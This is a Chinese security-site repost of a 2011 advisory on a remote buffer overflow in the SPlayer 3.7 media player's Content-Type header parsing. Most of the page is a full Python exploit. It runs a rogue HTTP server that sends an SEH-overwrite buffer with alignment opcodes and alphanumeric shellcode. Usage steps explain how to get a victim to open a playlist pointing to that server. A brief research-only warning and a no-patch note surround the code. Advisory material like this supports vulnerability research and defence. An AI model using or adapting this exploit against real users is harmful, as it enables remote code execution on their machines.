SPlayer "Content-Type"标头远程缓冲区溢出漏洞

发布于 2022-10-15 07:44:07 字数 11238 浏览 22 评论 0

SPlayer "Content-Type"标头远程缓冲区溢出漏洞

发布日期:2011-05-04
更新日期:2011-05-04

受影响系统:
Splayer Splayer 3.7
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47721

SPlayer是一款使用简单的多媒体播放器,

SPlayer在处理"Content-Type"头选项时存在远程缓冲区溢出漏洞,远程攻击者可利用此漏洞在受影响应用程序中运行任意代码或造成拒绝服务。

<*来源:xsploitedsec
  *>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  1. #!/usr/bin/python
  2. # Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit
  3. # Date: May 04, 2011
  4. # Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>
  5. # Software Link: http://www.splayer.org/index.en.html
  6. # Versions: <= 3.7 (build 2055)
  7. # Tested On: WinXP SP3 Eng / SPlayer 3.7 build 2055 (English Locale)
  8. # CVE: N/A
  9. # Software Descripton:
  10. # "SPlayer is a simple and free high performance all-in-one audio and video player that was designed
  11. # in order to help you easily view your videos, images and listen to your music files. SPlayer lets
  12. # you enjoy your favorite music and movies"
  13. # Vulnerability information:
  14. # SPlayer is vulnerable to a remote buffer overflow when parsing a specially crafted HTTP header from
  15. # a remote server. The bug is triggered due to the "Content-Type:" field being passed to the wcstol()
  16. # function, prior to any bounds checking. This could allow an attacker to trick a remote user into
  17. # opening a specially crafted playlist file, containing a URL pointing to a malicious web server.
  18. # Usage:
  19. # Method 1:
  20. # 1. Execute this script ...
  21. # 2. Launch SPlayer, right click and click open->URL (ctrl+u) ...
  22. # 3. Input the server URL and Click OK ...
  23. # 4. Boom!/calc ...
  24. # Method 2:
  25. # 1. Execute this script ...
  26. # 2. Launch SPlayer and click Open (ctrl+o) ...
  27. # 3. Browse to any playlist file (m3u, pls) It must contain the server URL! ...
  28. # 4. Click Open ...
  29. # 5. [wait til URL is loaded], Boom!/calc ...
  30. # URL Examples:
  31. # http://serverip/anyfilename.avi
  32. # http://serverip:port/anyfilename.avi
  33. # http://serverip/*
  34. # Shouts:
  35. # edb-team, corelanc0d3r/corelan-team, kaotix, sheep, deca, nemesis
  36. import sys
  37. import socket
  38. bindaddr = "0.0.0.0"
  39. bindport = 1234
  40. banner = "Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1"
  41. # calc shellcode / alpha_upper
  42. calcshell = (                  # Plenty of room for lots of shellcode here
  43. "PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAP"
  44. "AZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB3Y9R8Z9L8Y2RJT1N0V0Y0I0I0I0I0"
  45. "I0I0I0I0I0I0C0C0C0C0C0C070Q0Z1Z110X0P001100112K11110Q02110B020B0B000B0B110B0X0P0"
  46. "8110B2U0J0I0I2L0M080N1Y0E0P0G2P0C000Q2P0K090K0U0E1Q0H0R0B0D0L0K0B2R0P000L0K0F020"
  47. "F2L0L0K0C1R0G1T0N2K0Q1R0D1X0D0O0L2W0C2Z0E2V0E1Q0I2O0F0Q0K2P0L2L0E2L0Q2Q0C0L0E0R0"
  48. "D2L0G0P0O010J2O0D0M0G2Q0K2W0I2R0H2P0P0R0C1W0N2K0B2R0B000L0K0P0B0G0L0G2Q0H0P0N2K0"
  49. "C2P0Q1X0K050K2P0P2T0Q0Z0E0Q0H0P0B2P0N2K0C2X0F2X0L0K0B2X0E2P0E0Q0N030I2S0G0L0P0I0"
  50. "N2K0G0D0N2K0F1Q0I0F0P010I2O0E1Q0O000L2L0J1Q0H0O0F2M0C010O070G0H0K0P0B0U0L040E0S0"
  51. "C0M0K0H0E2K0Q2M0Q040P2U0K0R0P0X0N2K0F080G0T0C010I0C0E060N2K0F2L0B2K0N2K0B2X0G2L0"
  52. "C010K1S0N2K0G2T0L0K0C010H0P0L0I0Q0T0D1T0E2T0C2K0C2K0P1Q0B2Y0P0Z0P0Q0I2O0K0P0C1X0"
  53. "C2O0C1Z0N2K0F2R0H2K0L0F0C2M0B0J0E0Q0N2M0N1U0O0I0G2P0C000E0P0B2P0Q2X0P010N2K0P2O0"
  54. "O2W0K0O0J2U0M2K0J0P0N0U0I020F060E080N0F0L0U0O0M0M0M0K0O0I0E0E2L0F1V0Q2L0F1Z0M0P0"
  55. "K0K0M000Q1U0G2U0O0K0P0G0D0S0Q1R0P2O0P1Z0C000Q0C0K0O0J2U0E030C0Q0P2L0E030D2N0B0E0"
  56. "D080Q2U0C000E0Z1111KPA")
  57. class Client():
  58.     def about(self):
  59.         about = "\r=======================================================================\n"
  60.         about +=  " PoC Title: Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow\n"
  61.         about +=  " Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>\r\n"
  62.         about +=  "======================================================================="
  63.         print about
  64.     def run (self):
  65.         pre = "HTTP/1.1 200 OK\r\n"
  66.         pre += "Date: Tue, 03 May 2011 04:18:38 GMT\r\n"
  67.         pre += "Server: " + banner + "\r\n"
  68.         pre += "Last-Modified: Sun, 03 Jul 2005 18:39:44 GMT\r\n"
  69.         pre += "ETag: ""1f3814d-e6800-3fb032cba1c00""\r\n"
  70.         pre += "Accept-Ranges: bytes\r\n"
  71.         pre += "Content-Length: 99999\r\n"
  72.         pre += "Connection: close\r\n"
  73.         pre += "Content-Type: "
  74.         #Begin evil buffer
  75.         evil = "\x41" * 2073
  76.         evil += "\x61\x73"        #popad/nop align
  77.         evil += "\x25\x73"        #SE handler - ppr/splayer.exe [0x00730025]
  78.         #Close the blinds
  79.         evil += "\x73"            #nop/align
  80.         evil += "\x55"            #push ebp
  81.         evil += "\x73"            #nop/align
  82.         evil += "\x58"            #pop eax
  83.         evil += "\x73"            #nop/align
  84.         #Align to EAX/execute shellcode
  85.         evil += "\x05\x19\x11"        #add eax, 0x11001900
  86.         evil += "\x73"            #nop/align
  87.         evil += "\x2d\x11\x11"        #sub eax, 0x11001100
  88.         evil += "\x73"            #nop/align
  89.         evil += "\x50"            #push eax
  90.         evil += "\x73"            #nop/align
  91.         evil += "\xc3"            #ret
  92.         evil += "\x46" * 1004        #align shellcode->EAX
  93.         #End evil buffer
  94.         padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"
  95.         payload = pre + evil + calcshell + padding
  96.         try:
  97.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  98.             s.bind((bindaddr, bindport))
  99.             s.listen(5)
  100.             print "[+] Listening for incoming connections on port: %d" % bindport + " ..."
  101.         except:
  102.             print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
  103.             sys.exit()
  104.         # Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
  105.         # and it crashes after the second request
  106.         while 1:
  107.             (clientsock, address) = s.accept()
  108.             print "[*] New connection from", address[0]
  109.             clientsock.recv(1024)
  110.             sent = clientsock.send(payload)
  111.             print "[+] Payload sent successfully [size: %d bytes]" % sent
  112.             sent = 0
  113.             print "[-] Closing connection to", address[0]
  114.             clientsock.close()
  115. if __name__ == "__main__":
  116.     Client().about()
  117.     Client().run()

复制代码建议:
--------------------------------------------------------------------------------
厂商补丁:

Splayer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.splayer.org/index.en.html

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文